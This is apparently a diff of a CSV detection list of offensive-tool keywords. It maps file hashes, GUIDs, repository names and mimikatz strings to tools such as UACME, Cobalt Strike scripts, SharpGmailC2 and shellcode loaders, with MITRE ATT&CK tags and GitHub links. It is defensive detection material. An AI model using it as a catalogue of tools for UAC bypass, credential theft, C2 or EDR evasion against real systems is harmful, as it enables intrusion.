TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" -"*87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" -"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" -"*893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*894a784e-e04c-483c-a762-b6c03e744d0b*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" -"*8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" -"*912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*913d774e5cf0bfad4adfa900997f7a1a*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*913d774e5cf0bfad4adfa900997f7a1a*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*91EA50CD-E8DF-4EDF-A765-75354643BD0D*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*946D24E4-201B-4D51-AF9A-3190266E0E1B*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*99E40E7F-00A4-4FB1-9441-B05A56C47C08*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" -"*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" -"*9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*9E357027-8AA6-4376-8146-F5AF610E14BB*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","0","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" -"*9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9emin1/charlotte*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*A La Vie* A L'Amour*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9emin1/charlotte*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*A La Vie* A L'Amour*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*a0rtega/metame*","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","1","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" "*A17656B2-42D1-42CD-B76D-9B60F637BCB5*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*A38C04C7-B172-4897-8471-E3478903035E*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*A38C04C7-B172-4897-8471-E3478903035E*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" 